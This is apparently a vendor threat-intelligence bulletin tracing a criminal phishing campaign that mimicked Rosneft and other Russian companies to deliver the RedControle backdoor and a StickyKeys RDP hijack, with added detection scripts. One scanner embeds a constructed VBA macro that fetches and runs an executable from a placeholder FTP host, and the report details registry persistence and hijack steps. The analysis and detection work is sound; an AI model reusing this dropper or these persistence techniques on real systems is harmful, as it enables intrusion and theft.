Nation-state conflict has come to dominate many of the policy discussions and much of the strategic thinking about cybersecurity. When events of geopolitical significance hit the papers, researchers look for parallel signs of sub rosa cyber activity carried out by state-sponsored threat actors—espionage, sabotage, coercion, information operations—to complete the picture. After all, behind every story may lurk a cyber campaign.
But ordinary criminals read the newspaper too and are keenly aware of the bias some researchers bring to the table. Exploiting that bias can provide additional camouflage, another layer of seeming invisibility, making threat actors harder to detect.
In this Threat Intelligence Bulletin, we’ll show how an investigation into the apparent targeting of a state-owned Russian oil company led to the uncovering not of a state-sponsored campaign but of the bold activity of what we believe to be a criminal effort motivated by the oldest of incentives—money.
Rosneft calls itself the world’s largest publicly traded oil company, and, according to recent analysis in the New York Times, it is also a prominent foreign policy tool of the Russian government. More than half of the company is owned by Moscow and serves as a major pillar of critical infrastructure for Russia as well as other neighboring nation states.
So when a deal reportedly worth in excess of $10 billion was announced to take nearly 20% of the company private, news organizations around the world took note.
The deal quickly became the subject of international political intrigue: Who were the buyers? Why was it sold? Who brokered the deal? Those questions became even more pointed when the transaction received conspicuous mention in the now-infamous Steele Dossier.
Reporters, business leaders, and international observers also focused scrutiny on Rosneft in part because the deal was, according to news reports, fraught with delays and setbacks and came to involve a cast of characters that reportedly included a former Qatari diplomat turned head of a sovereign wealth fund.
Everything we learned about Rosneft in the last few years—its status as critical infrastructure, the huge sums of money involved in its privatization, its domestic and international political significance—made it a highly likely and legitimate target of foreign espionage efforts.
Indeed, when we at Cylance first saw the name “Rosneft” emerge in our research, we thought that was exactly what we were looking at: another state or state-sponsored espionage effort.
But we soon discovered that our initial impressions were flawed.
In July 2017, Cylance stumbled upon some interesting macros embedded in Word documents we uncovered in a common malware repository that seemed to be aimed at Russian-speaking users. We observed the same type of document resurface in the beginning of 2018 and decided to take a closer look.
Upon closer inspection, we noticed that the malware author meticulously used command and control (C2) domains which very closely mimicked their real counterparts in the Russian oil and gas industries, in particular Rosneft and subsidiaries of Rosneft.
As we investigated further, we discovered that the threat actor had created similar sites to mimic more than two dozen mostly state-owned oil, gas, chemical, agricultural, and other critical infrastructure organizations, in addition to major Russian financial exchanges.
The first Rosneft-related site we came across was “rnp-rosneft[.]ru” which was designed to resemble the legitimate webpage “mp-rosneft[.]ru”. The only reference to this domain we could identify was the email address “sec_hotline@mp-rosneft[.]ru” which was used by Rosneft for confidentially reporting corporate fraud, corruption, and embezzlement.
After a bit of malware excavation, we discovered that the author had been operating for more than three years with very few changes to the actual malware used other than his/her targets. Interestingly, we uncovered evidence that suggests the actor started out targeting the gaming community, specifically users of Steam, then quickly evolved to more lucrative endeavors.
Cylance researchers identified several phishing documents which used Microsoft Office macros to deliver malicious implants to their targets. It’s not entirely clear whether these were specifically targeted at isolated groups or utilized the old spray-and-pray method to cast a much wider net. Let’s take a look at one:
Filename: На ознакомление.doc ~ For Review.doc
Figure 1: Macro Contents of Phishing Document
At a high level, this macro writes a number of FTP commands to a text file named “1.txt” in %APPDATA%. When that script is executed by the last command, it logs in to an FTP server hosted on “rnp-rosneft[.]ru”, downloads a file, and saves it as “module.exe”. It then starts the “module.exe” binary and deletes another file named “1.cmd”. The binary “module.exe” was a modern variant of a family of malware that ESET calls “RedControle.” Cylance identified several other phishing documents which operated in a similar vein; they are listed in the Appendix.
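The macro pattern just described (an FTP command script written to %APPDATA%, run through ftp.exe, then a dropped executable launched and the script deleted) is recognisable from the macro source alone. The heuristic scanner below is an added example, not Cylance tooling or code from the phishing documents; the sample macro it is run against is constructed for the test, uses a placeholder host, and only mirrors the steps the report lists. The `-s:` option is the standard Windows ftp.exe switch for running a command script.

```python
"""Heuristic scan of VBA macro source for the FTP-script dropper pattern.
Added example with constructed sample input; not code from the report."""
import re

# Each indicator is one step of the dropper chain described in the report.
INDICATORS = [
    ("autorun_entry", re.compile(r"\b(AutoOpen|Document_Open|Workbook_Open)\b", re.I)),
    ("writes_to_appdata", re.compile(r"%APPDATA%|Environ\s*\(\s*\"APPDATA\"\s*\)", re.I)),
    ("ftp_script_exec", re.compile(r"\bftp(\.exe)?\b[^\n]*-s:", re.I)),      # ftp -s:<script>
    ("shell_launches_exe", re.compile(r"\bShell\s*\(?[^\n]*\.exe", re.I)),   # Shell "... x.exe"
    ("deletes_dropped_file", re.compile(r"\bKill\b|\bdel\b", re.I)),          # cleanup step
]

def scan_macro(source: str) -> dict:
    """Return which indicators fired, a score, and a verdict (3+ hits = suspicious)."""
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS}
    score = sum(hits.values())
    return {"hits": hits, "score": score, "suspicious": score >= 3}

# Constructed sample mirroring the described chain; the host is a placeholder.
SAMPLE_MACRO = '''
Sub AutoOpen()
    Dim p As String
    p = Environ("APPDATA") & "\\1.txt"
    Open p For Output As #1
    Print #1, "open ftp.example-c2.invalid"
    Print #1, "get module.exe"
    Print #1, "bye"
    Close #1
    Shell "cmd /c ftp -s:" & p & " && start module.exe && del 1.cmd", vbHide
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = '''
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(label, scan_macro(src))
```

Run on extracted macro text (for example the output of an OLE VBA extractor), this flags the full chain while ignoring formatting macros; the threshold of three hits is an assumption chosen to tolerate documents that legitimately touch %APPDATA%.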
We were able to recover several recent samples associated with phishing attempts connected to the rnp-rosneft[.]ru domain as well as some older samples tied to trstorg[.]ru from July 2017. From what we could gather, “trstorg[.]ru” was originally the website of a Russian company called “TechnoSnabTorg”, which sold spare parts for drilling and road-building equipment; the company specialized in providing parts for Caterpillar, Komatsu, Volvo, Fiat, and Hitachi equipment.
This sample was first submitted to online virus scanners in July 2017 and was detected by only 13 vendors at that time:
SHA256 of 2017 RedControle Sample:
Актуальный ПРАЙС10.07.2017.exe, ApMsgFwd.exe, SetLogin1Connect.exe
The backdoor was programmed in Delphi and communicates over HTTP to two C2 servers. It sends information about the IP address, hostname, and attached drives in its initial communications.
It first attempts to communicate directly to the IP address “91.211.245[.]246” on TCP port 80 and then will attempt to communicate to “83.166.242[.]15” on TCP port 17425. Keystroke data, clipboard data, as well as window names are communicated in clear text via HTTP to the 91.211.245[.]246 in near-real time as the victim interacts with their computer.
The information is collected using a well-known method leveraging the SetWindowsHookExA API. Commands are received from the other C2 server “83.166.245[.]15” in what appears to be cleartext; however, the backdoor also has the ability to communicate over SSL using the Delphi Indy library:
Figure 2: Example TCP HTTP Requests Sending Keystroke and Window Data
The backdoor installs itself using the good old-fashioned Run key under the infected user’s registry hive.
The backdoor had the ability to upload and download files, manipulate files and folders, compress and decompress files using ZLIB, enumerate drive information and host information, elevate privileges, capture screenshots and webcam pictures, block and/or simulate user input, log keystrokes, and manipulate processes on the infected system.
Directives from the C2 were broken up at random points by the character “_”, likely in an attempt to evade HIDS and NIDS signatures; for example, the command “ST_A_RT_FI_LE”.
Later versions of RedControle used randomized strings broken up by the same “_” character to further hinder signature-based analysis and reverse engineering efforts. In the sample Cylance researchers analyzed, the initial connection looked something like this:
The string in BLUE was sent by the C2 server and the string in RED was sent by the victim as an initial check-in containing the IP address and a unique victim identifier. The backdoor ran a series of threads, each isolating a different piece of backdoor functionality and firing on its own pre-defined Delphi timer.
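The underscore padding described above defeats a literal signature for “STARTFILE”, but it is easy to counter either by normalizing traffic before matching or by generating a signature that tolerates the padding. The code below is an added example, not Cylance’s or the malware author’s code; the session lines are constructed, and only the “STARTFILE” directive comes from the report, the other keywords being assumed for illustration.

```python
"""Detect underscore-fragmented C2 directives two ways: normalize-then-match,
and a padding-tolerant regex for use where preprocessing is not possible.
Added example with constructed sample traffic; not code from the report."""
import re

# Only STARTFILE (from "ST_A_RT_FI_LE") is documented in the report;
# the rest are assumed directive names for illustration.
KNOWN_DIRECTIVES = {"STARTFILE", "GETFILE", "PUTFILE", "SCREENSHOT", "KEYLOG"}

def normalize_directive(raw: str) -> str:
    """Strip the "_" padding so "ST_A_RT_FI_LE" becomes "STARTFILE"."""
    return raw.replace("_", "").strip().upper()

def match_directive(raw: str):
    """Return the canonical directive name if the padded token is known."""
    norm = normalize_directive(raw)
    return norm if norm in KNOWN_DIRECTIVES else None

def directive_regex(keyword: str) -> str:
    """Build a regex tolerating any number of "_" between letters,
    e.g. STARTFILE -> S_*T_*A_*R_*T_*F_*I_*L_*E (usable in a NIDS rule)."""
    return "_*".join(re.escape(ch) for ch in keyword)

def scan_session(lines):
    """Return (line_no, raw_token, directive) for lines carrying a known directive."""
    findings = []
    for i, line in enumerate(lines, 1):
        # Directives appear as uppercase tokens, possibly split by "_".
        for token in re.findall(r"[A-Z_]{4,}", line):
            m = match_directive(token)
            if m:
                findings.append((i, token, m))
    return findings

# Constructed session: "S>" lines from the C2 server, "C>" lines from the victim.
SAMPLE_SESSION = [
    "S> ST_A_RT_FI_LE c:\\temp\\x.exe",
    "C> OK",
    "S> GE_T_FILE c:\\docs\\report.docx",
    "C> 200",
    "S> HELLO",
]

if __name__ == "__main__":
    print(scan_session(SAMPLE_SESSION))
    print(directive_regex("STARTFILE"))
```

Both approaches cover the fixed-keyword variant only; the later versions with randomized strings mentioned above leave nothing to normalize, so those require behavioural detection (for example the HTTP-to-bare-IP check-ins and the registry persistence) rather than content signatures.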
The backdoor appeared to be a mishmash of different authorship with the keylogger portion containing Portuguese language strings and other functions related to process manipulation containing references to Slavic language strings. These strings were eventually removed or obfuscated in later versions.
Cylance identified an executable dropper:
The dropper planted a version of RedControle on the system as well as another interesting binary while showing the potential victim a nice picture of a holiday present. The dropper was relatively uninteresting; however, a Sticky Keys backdoor would also be placed on the system, which warranted additional analysis.
Dropper SHA256 Hash:
Associated RedControle SHA256:
Associated StickyKeys SHA256:
The dropper created two executable files within the folder “%ALLUSERSPROFILE%\Documents”, “svhost.exe” and “system.exe” and created two associated Run keys to maintain persistence for both executables. The program “svhost.exe” was the aforementioned RedControle variant with network callbacks to the domain “trstorg[.]ru” and the IP address “83.166.243[.]48”.
The “system.exe” file was a StickyKeys backdoor programmed in Delphi. It first opened TCP port 3389 in the Windows Firewall and then set the following Registry Keys:
The file was primarily responsible for enabling RDP on the target system and performing a sticky keys hijack to point to the legitimate “taskmgr.exe” binary.
If our readers are unfamiliar with StickyKeys, it was originally designed for people who have difficulty holding down two or more keys simultaneously. StickyKeys can be enabled on Windows by pressing the Shift key five times in quick succession. The registry key above causes the Task Manager binary “taskmgr.exe” to be launched alongside the intended StickyKeys binary. The StickyKeys backdoor then performs a connectivity test that corresponded to “google.ru” and various subdomains. If the test is successful, it makes the following HTTP request to “trstorg[.]ru” on TCP port 80:
Figure 3: Example Request and Server Response from StickyKeys Backdoor
This particular sample will no longer work as the IP address “80.254.96[.]251” appeared to have been reassigned to another party and no longer operates a webserver.
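The persistence and hijack described for this dropper all leave registry traces: two Run entries pointing at “svhost.exe” and “system.exe” under a Documents folder, a StickyKeys redirection, and an inbound firewall allow rule for TCP 3389. The auditor below is an added example, not Cylance’s code, and works on a `.reg` export so it runs anywhere. It assumes the sticky keys hijack is implemented with an Image File Execution Options “Debugger” value on sethc.exe (the report says only that StickyKeys was pointed at taskmgr.exe), that %ALLUSERSPROFILE%\Documents resolves to C:\ProgramData\Documents, and the usual `FirewallRules` value format; the export is constructed for the test.

```python
"""Audit a Windows .reg export for StickyKeys hijack, suspicious Run keys and
an inbound RDP firewall rule. Added example with constructed input."""
import re

IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
RUN_KEY_SUFFIX = r"\Software\Microsoft\Windows\CurrentVersion\Run"
FIREWALL_RULES = r"\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules"
# Accessibility binaries commonly redirected via an IFEO "Debugger" value (assumed list).
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", "magnify.exe"}
# Run entries under a Documents folder, or the svchost.exe lookalike name from the report.
SUSPICIOUS_RUN = re.compile(r"\\documents\\[^\\]+\.exe|\bsvhost\.exe\b", re.I)

def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: data}} (string data only)."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and "=" in line and not line.startswith(";"):
            name, _, data = line.partition("=")          # split on the first "=" only
            keys[current][name.strip('"')] = data.strip('"').replace("\\\\", "\\")
    return keys

def audit(text):
    """Return a list of (finding_type, subject, detail) tuples."""
    findings = []
    for key, values in parse_reg(text).items():
        k = key.lower()
        if k.startswith(IFEO.lower()):
            exe = key.rsplit("\\", 1)[-1].lower()
            if exe in ACCESSIBILITY_BINARIES and "Debugger" in values:
                findings.append(("ifeo_hijack", exe, values["Debugger"]))
        if k.endswith(RUN_KEY_SUFFIX.lower()):
            for name, cmd in values.items():
                if SUSPICIOUS_RUN.search(cmd):
                    findings.append(("run_key_persistence", name, cmd))
        if k.endswith(FIREWALL_RULES.lower()):
            for name, rule in values.items():
                fields = set(rule.split("|"))
                if {"Action=Allow", "Dir=In", "LPort=3389"} <= fields:
                    findings.append(("rdp_inbound_allow", name, rule))
    return findings

# Constructed export; the rule GUID is a placeholder.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\taskmgr.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svhost"="C:\\ProgramData\\Documents\\svhost.exe"
"system"="C:\\ProgramData\\Documents\\system.exe"
"OneDrive"="C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{placeholder-rule-id}"="v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=3389|Name=rdp|"
'''

if __name__ == "__main__":
    for f in audit(SAMPLE_REG):
        print(f)
```

Exporting the three hives with `reg export` and feeding the text to `audit()` gives the same checks on a live host; a Debugger value on any accessibility binary is a finding on its own, since there is no legitimate reason for one.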
The RedControle backdoors frequently created the unique mutex
which directly links the above samples to the following hashes through open source intelligence:
Several of these samples communicated to the domains “sxe-csgo[.]net” and “h84622.s05.test-hf[.]su”.
These domains led to two primary IP addresses: “91.227.16[.]115” and “91.227.16[.]6” as well as a few hundred unique file hashes.
The IP addresses “109.68.190[.]244” and “46.38.50[.]106”, which resolved to “sxe-csgo[.]net” in 2015 and 2016, let Cylance definitively tie this subset of activity to activity targeting the Russian Steam community as well as the Counter-Strike and CS:GO communities previously documented here, here, and here.
The threat actor left bits of infrastructure open over time and Cylance was able to harvest some of the server-side scripts utilized by the malware for tracking and recording data stolen from intended victims. Additionally, the attacker utilized Cloudflare for free bulk SSL certificates, which inadvertently exposed a number of domains.
The attacker put a lot of time and effort into closely imitating legitimate domains and continually altered their targets over time. They would also occasionally register legitimate domains after the domains had expired.
The actor relied heavily upon the Lithuanian provider “vpsnet[.]lt”, likely because of its low cost: a couple of euros per month per virtual private server (VPS).
When we first discovered that the threat actor was using more than two dozen websites to mimic real Russian critical infrastructure companies, we were intrigued. The effort required to set up those domains seemed disproportionate to the perceived benefit of using them simply as command-and-control infrastructure.
Then we saw a paid contributor article in a Russian edition of Forbes, published in April 2017 and entitled (in Google’s translation to English) Attack of the Clones: How Schemes Work with Fake Sites of Rosneft and Other Large Companies.
The author was Ilya Sachkov, the founder and CEO of infosec company Group-IB and a member of cybercrime expert committees in the Council of Europe and the OSCE.
The article described what appeared to be unpublished Group-IB research findings into an elaborate criminal scheme wherein a threat actor was creating near-clones of legitimate Russian critical infrastructure companies—Rosneft most prominent among them—in order to harvest credentials and perpetuate fraud.
In the article, Sachkov provided screen shots of many of the mimicked sites to establish just how painstakingly close to the original these fake sites were designed to look.
The article referenced several of the companies and websites by name, which Group-IB said were part of the fraud campaign. At least one of the affected companies was described in the article as being a client of Group-IB.
That company’s domain, as well as nearly all of the other domains cited by Group-IB were also uncovered in the Cylance investigation. For example, in addition to Rosneft, they included: Mendeleevkazot, HCSDS, and EuroChem. Mendeleevkazot is a fertilizer manufacturer and part of a larger Russian critical infrastructure holding company. HCSDS is an acronym for a Siberian Business Union, a holding company comprised of several Russian critical infrastructure companies. EuroChem (Group-IB’s apparent client) is a Swiss-based fertilizer company with its primary mining activity in Russia. Its name came up in several news-related searches indicating its involvement in large financial transactions as well as geopolitical maneuvering.
Given the overlap in findings and the direct connection to past criminal campaigns targeting the gaming community, it seemed clear we were looking at the same operation—a criminal operation, not nation-state espionage activity.
The line between well-organized criminal efforts and nation-state activity can often be blurry, but practitioners and consumers of threat intelligence should beware of inherent biases. As we have shown in this Bulletin, what appears at first blush to be a clear indicator of nation-state malfeasance may in fact simply allow a criminal to hack your way of thinking shortly before hacking your organization.
Phishing Documents Hashes:
C2 and Phishing Domains: